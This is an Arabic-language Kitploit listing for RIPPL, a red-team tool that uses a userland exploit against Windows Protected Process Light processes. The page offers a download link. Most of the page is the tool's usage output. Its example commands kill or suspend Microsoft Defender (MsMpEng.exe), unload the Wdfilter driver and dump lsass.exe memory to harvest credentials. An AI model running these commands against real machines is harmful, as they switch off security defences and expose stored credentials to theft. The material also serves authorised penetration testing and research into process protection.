Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
RIPPL — RIPPL هي أداة تستغل ثغرة في وضع المستخدم فقط للتلاعب بعمليات PPL على نظام Windows | Kitploit
أدوات/GitHubGitHub/last-byte/rippl
تصعيد الامتيازاتالاستغلالما بعد الاستغلالالفريق الأحمر
GitHublast-byte/rippl

RIPPL

RIPPL هي أداة تستغل ثغرة في وضع المستخدم فقط للتلاعب بعمليات PPL على نظام Windows

عرض المستودع
712منذ 4 سنواتلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

RIPPL

التلاعب بالعمليات المحمية بنظام PPL دون استخدام برنامج تشغيل

defender funny

تنفّذ هذه الأداة استغلالًا يعمل في بيئة المستخدم (userland) للتلاعب بالعمليات المحمية بنظام PPL في Windows. نوقشت هذه التقنية في البداية من قبل James Forshaw (المعروف باسم @tiraniddo) وClément Labro (المعروف باسم @itm4n) في المقالات التالية.

  • مقال من James Forshaw: Windows Exploitation Tricks
  • مقال من Clément Labro الجزء الأول: Do You Really Know About LSA Protection (RunAsPPL)?
  • مقال من Clément Labro الجزء الثاني: Bypassing LSA Protection in Userland

الاستخدام

تحذير: الإصدار الآمن من الملف التنفيذي لا يُخرج أي شيء على الإطلاق، إذ تتم إزالة جميع السلاسل النصية ودوال الطباعة باستخدام وحدات ماكرو التجميع الشرطي.

ما عليك سوى تشغيل الملف التنفيذي دون تمرير أي وسيط (argument) وستحصل على مساعدة/تعليمات استخدام مفصّلة (وهذا ينطبق فقط على الملفات الثنائية المجمَّعة دون تعريف ماكرو OPSEC)

root@kitploit:~
c:\Temp>.\rippl.exe
  _____  _____ _____  _____  _
 |  __ \|_   _|  __ \|  __ \| |
 | |__) | | | | |__) | |__) | |      version 0.1
 |  _  /  | | |  ___/|  ___/| |      by @last0x00
 | | \ \ _| |_| |    | |    | |____  forked by itm4n's PPLDump
 |_|  \_\_____|_|    |_|    |______|

Description:
  Manipulate Protected Process Light (PPL) processes with a *userland* exploit

Usage:
  rippl.exe (-D|-K|-S|-R|-L|-X|-W|-Z|-T|-U) [-v] [-d] [-f] (PROC_NAME|PID) [DUMP_FILE|DRIVER_NAME]
  () -> mandatory arguments
  [] -> optional arguments

Operation modes (choose ONLY one):
  -D -> Dump the given process
  -K -> Kill the given process
  -S -> Suspend the given process
  -R -> Resume the previously suspended process
  -L -> Leak a PROCESS_ALL_ACCESS handle to the given process (not yet implemented)
  -X -> Kill the given process by assigning it to a job object and terminating the object
  -W -> Freeze the process by assigning it to a job object and severely constraining its CPU resources
  -Z -> Kill the given process by injecting a thread into it which calls exit(0)
  -T -> Sandbox the process by disabling all of its token's privileges and lowering integrity to untrusted
  -U -> Unload the provided driver

Arguments:
  PROC_NAME   -> The name of the process to interact with
  PID         -> The ID of the process to interact with
  DUMP_FILE   -> The path of the output dump file - valid ONLY with the -D option
  DRIVER_NAME -> The name of the driver to unload - valid ONLY with the -U option

Options:
  -d -> (Debug) Enable debug mode
  -f -> (Force) Bypass DefineDosDevice error check

Examples:
  rippl.exe -K MsMpEng.exe
  rippl.exe -S MsMpEng.exe
  rippl.exe -R MsMpEng.exe
  rippl.exe -D -f lsass.exe lsass.dmp
  rippl.exe -D -d -f 720 out.dmp
  rippl.exe -U Wdfilter
تنزيل الأداة